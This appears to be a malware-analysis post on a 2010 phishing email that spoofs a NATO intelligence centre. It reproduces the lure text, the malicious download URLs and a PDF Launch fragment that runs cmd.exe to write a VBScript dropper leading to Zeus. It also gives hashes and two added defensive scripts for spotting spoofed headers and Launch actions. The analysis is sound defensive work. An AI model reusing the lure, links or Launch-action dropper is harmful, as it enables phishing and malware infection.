Update: Please read detailed analysis of this and associated attacks
Crime or Espionage? by Nart Villeneuve
Download as a password-protected archive (contact me if you need the password)
Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB
FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU
Additional information can be found in the following report:
http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip
> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia - operation
> "Atalanta", is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> - the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> - the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS - EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319
Headers
X-VirusChecked: Checked
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Msg-Ref: xxxxxxxxxxx
X-StarScan-Version: 6.2.4; banners=-,-,-
X-Originating-IP: [174.132.255.10]
X-SpamReason: No, hits=1.0 required=7.0 tests=BODY_RANDOMQ
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
(174.132.255.10) by xxxxxxxxxx
DHE-RSA-AES256-SHA encrypted SMTP; 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
(envelope-from <gnarusm@mail.thecopperstar. com>) id
1OocRS-0006Y5-PR for
XXXXXXXXXX; Thu, 26 Aug 2010 08:24:30 -0500
To: XXXXXXXXX
Subject: From Intelligence Fusion Centre to XXXXXXX
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail. thecopperstar.com>
Date: Thu, 26 Aug 2010 08:24:30 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.thecopperstar.com
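The checks worth running on the headers above, as an added example that is not part of the original post: the display From claims ifc@ifc.nato.int, but the envelope sender recorded by the gateway (X-Env-Sender and Exim's envelope-from) is a local user on mail.thecopperstar.com, and the injecting host is a static ThePlanet address that HELOs as that same box. The script reassembles the headers with folding restored; the receiving MX and the recipient, redacted as XXXX on the page, are replaced with .invalid placeholders, and the `with` before the cipher name in the second Received line is an assumption about what the redaction covered.

```python
"""Spot a spoofed display From by comparing it with the envelope sender and
the hop that injected the message. Added example; input is constructed."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the headers above with folding restored. The receiving
# MX and recipient were redacted on the page; .invalid placeholders stand in.
SAMPLE_HEADERS = """\
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Originating-IP: [174.132.255.10]
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
 (174.132.255.10) by mx.example.invalid with DHE-RSA-AES256-SHA encrypted SMTP;
 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
 (envelope-from <gnarusm@mail.thecopperstar.com>) id 1OocRS-0006Y5-PR
 for victim@example.invalid; Thu, 26 Aug 2010 08:24:30 -0500
To: victim@example.invalid
Subject: From Intelligence Fusion Centre to victim
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail.thecopperstar.com>
Date: Thu, 26 Aug 2010 08:24:30 -0500
"""


def _unfold(value):
    """Collapse RFC 5322 header folding into single spaces."""
    return re.sub(r"\s+", " ", value).strip()


def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _same_org(d1, d2):
    """True when one domain equals or is a subdomain of the other."""
    return d1 == d2 or d1.endswith("." + d2) or d2.endswith("." + d1)


def parse_hops(msg):
    """Received chain, nearest-to-us first, with the claimed sending host,
    HELO name and literal IPv4 where the receiving MTA recorded them."""
    hops = []
    for raw in msg.get_all("Received", []):
        value = _unfold(raw)
        m_from = re.match(r"from\s+(\S+)", value)
        m_helo = re.search(r"\(HELO\s+([^)\s]+)\)", value, re.I)
        m_ip = re.search(r"\((\d{1,3}(?:\.\d{1,3}){3})\)", value)
        hops.append({"from": m_from.group(1) if m_from else None,
                     "helo": m_helo.group(1) if m_helo else None,
                     "ip": m_ip.group(1) if m_ip else None,
                     "raw": value})
    return hops


def envelope_sender(msg, hops):
    """Prefer the gateway's X-Env-Sender; fall back to Exim's envelope-from."""
    env = msg.get("X-Env-Sender")
    if env:
        return env.strip()
    for hop in hops:
        m = re.search(r"envelope-from\s+<([^>]+)>", hop["raw"])
        if m:
            return m.group(1)
    return None


def origin_hop(hops):
    """The hop nearest the origin that carries a literal IP: the host that
    handed the message to the first MTA we have any reason to trust."""
    for hop in reversed(hops):
        if hop["ip"]:
            return hop
    return None


def analyze(raw_headers):
    msg = message_from_string(raw_headers)
    hops = parse_hops(msg)
    from_addr = parseaddr(msg.get("From", ""))[1]
    env = envelope_sender(msg, hops)
    org = origin_hop(hops)
    from_dom, env_dom = _domain(from_addr), _domain(env or "")
    findings = []
    if from_dom and env_dom and not _same_org(from_dom, env_dom):
        findings.append(f"display From domain {from_dom} != envelope sender domain {env_dom}")
    if org and org["from"] and from_dom and not org["from"].lower().endswith(from_dom):
        findings.append(f"injecting host {org['from']} ({org['ip']}) is outside {from_dom}")
    if org and org["helo"] and org["from"] and org["helo"].lower() != org["from"].lower():
        findings.append(f"HELO {org['helo']} does not match reverse name {org['from']}")
    return {"from_address": from_addr, "envelope_sender": env,
            "origin_ip": org["ip"] if org else None,
            "origin_host": org["from"] if org else None,
            "findings": findings, "spoof_suspected": bool(findings)}


if __name__ == "__main__":
    for line in analyze(SAMPLE_HEADERS)["findings"]:
        print("!", line)
```

None of these three findings is conclusive on its own (legitimate mailing lists and outsourced senders break all of them), but a From in a government domain combined with an envelope sender and injecting host at an unrelated hosting provider is exactly the pattern a mail gateway should quarantine for review.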
174.132.255.10
Hostname: a.ff.84ae.static.theplanet.com
ISP: THEPLANET.COM INTERNET SERVICES
Organization: THEPLANET.COM INTERNET SERVICES
Type: Broadband
Assignment: Static IP
Country: United States
State/Region: Texas
http://www.virustotal.com/file-scan/report.html?id=5761e303d7bc027df47b5b01a3e4e8e186eb36d3a4f40956768231ef3bbcac46-1282832496
Submission date: 2010-08-26 14:21:36 (UTC)
Current status: finished
Result: 11 /41 (26.8%)
Avast 4.8.1351.0 2010.08.26 PDF:Risk-A
Avast5 5.0.594.0 2010.08.26 PDF:Risk-A
BitDefender 7.2 2010.08.26 Exploit.PDF-Dropper.Gen
eSafe 7.0.17.0 2010.08.26 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7818 2010.08.26 PDF/Pidief.RU
F-Secure 9.0.15370.0 2010.08.26 Exploit.PDF-Dropper.Gen
GData 21 2010.08.26 Exploit.PDF-Dropper.Gen
Kaspersky 7.0.0.125 2010.08.26 Trojan-Dropper.VBS.Pdfka.b
nProtect 2010-08-26.01 2010.08.26 Exploit.PDF-Dropper.Gen
PCTools 7.0.3.5 2010.08.26 Trojan.Dropper
SUPERAntiSpyware 4.40.0.1006 2010.08.26 -
Symantec 20101.1.1.7 2010.08.26 Trojan.Dropper
MD5 : 8b3a3c4386e4d59c6665762f53e6ec8e
/Type /Action
/S /Launch
/Win /F (cmd.exe)
/P (
/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream")
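/Launch is a documented PDF action type (ISO 32000-1), not a parser bug: the object above asks the viewer to run cmd.exe with the /P string as its arguments, and that string builds a VBScript file line by line with echo ... > vbs1.vbs. The scanner below is an added example, not code from the original post. It pulls every Launch action out of a PDF, decodes the /F and /P strings (literal strings with balanced parentheses and escapes, hex strings, and the #xx name escapes sometimes used to hide /Launch) and flags the ones wired to the catalog's /OpenAction, which fire as soon as the file is opened. It runs on a constructed minimal PDF modelled on the fragment above; it does not inflate compressed object streams, so a sample that hides the action inside /ObjStm must be decompressed first.

```python
"""Find PDF /Launch actions and recover the command they run. Added example;
runs on a constructed PDF and does not inflate compressed object streams."""
import re

# Constructed sample: a minimal PDF whose OpenAction is a Launch action built
# like the one above. /L#61unch is the #xx name-escape spelling of /Launch.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /Type /Action /S /L#61unch
   /Win << /F (cmd.exe)
           /P (/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream") >> vbs1.vbs) >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def decode_names(blob):
    """Undo #xx escapes in names so /L#61unch compares equal to /Launch."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), blob)


def parse_literal(data, start):
    """Parse a literal string starting at data[start] == b'(' with nested
    balanced parentheses, backslash escapes and \\ddd octal codes.
    Returns (decoded bytes, index just past the closing parenthesis)."""
    out, depth, i = bytearray(), 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            oct_m = re.match(rb"[0-7]{1,3}", data[i + 1:i + 4])
            if oct_m:
                out.append(int(oct_m.group(0), 8) & 0xFF)
                i += 1 + len(oct_m.group(0))
            else:
                nxt = data[i + 1:i + 2]
                out += ESCAPES.get(nxt, nxt)  # \( \) \\ map to themselves
                i += 2
            continue
        if c == b"(":
            depth += 1
            if depth == 1:
                i += 1
                continue
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
        out += c
        i += 1
    return bytes(out), i  # unterminated string: return what we have


def string_value(body, key):
    """Value of /key in an object body when it is a literal or hex string."""
    m = re.search(rb"/" + key + rb"\s*([(<])", body)
    if not m:
        return None
    pos = m.start(1)
    if body[pos:pos + 1] == b"(":
        return parse_literal(body, pos)[0]
    hexdigits = re.sub(rb"\s", b"", body[pos + 1:body.index(b">", pos)])
    if len(hexdigits) % 2:
        hexdigits += b"0"  # PDF pads an odd trailing digit with 0
    return bytes.fromhex(hexdigits.decode("ascii"))


def find_launch_actions(pdf):
    """One record per Launch action: object number, target file, parameter
    string, and whether the catalog's /OpenAction triggers it on open."""
    pdf = decode_names(pdf)
    launches, open_action_refs = [], set()
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        for ref in re.findall(rb"/OpenAction\s+(\d+)\s+\d+\s+R", body):
            open_action_refs.add(int(ref))
        if re.search(rb"/S\s*/Launch\b", body):
            launches.append({"obj": num,
                             "file": string_value(body, b"F"),
                             "params": string_value(body, b"P")})
    for rec in launches:
        rec["auto"] = rec["obj"] in open_action_refs
    return launches


if __name__ == "__main__":
    for rec in find_launch_actions(SAMPLE_PDF):
        trigger = "fires on open" if rec["auto"] else "needs a click"
        print(f"obj {rec['obj']}: {rec['file']!r} {rec['params']!r} ({trigger})")
```

The balanced-parenthesis handling matters here: the payload's own CreateObject("ADODB.Stream") contains parentheses, so a scanner that stops at the first `)` truncates the command and misses the rest of the dropper.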
-------------------------------------------------
Windows XP SP2, Adobe Reader 9.1
A quick flash of the black cmd.exe window, and a new icon, exe.exe, appears on the desktop.
Files created:
c:\windows\system32\ntos.exe  28C4648F05F46A3EC37D664CEE0D84A8
exe.exe, in the same directory as the original file  5fb94eef8bd57fe8e20ccc56e33570c5
An ntos.exe dropped into system32 is the classic sign of old Zeus, and that is what this is.
File name: exe.exe
http://www.virustotal.com/file-scan/report.html?id=33ac66e78d410d03f5644fb1569ea7d28e823561e00b86593d9022f554127c7e-1282847843
Result: 3 /41 (7.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
MD5 : 5fb94eef8bd57fe8e20ccc56e33570c5
File name: ntos.exe
http://www.virustotal.com/file-scan/report.html?id=c61fdc96fb7861396d7aa99a26cb6dff3f92aeeccf93d212a8fa3e166adec6aa-1282850806
Submission date: 2010-08-26 19:26:46 (UTC)
Result: 4 /39 (10.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
Panda 10.0.2.7 2010.08.26 Suspicious file
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
MD5 : 28c4648f05f46a3ec37d664cee0d84a8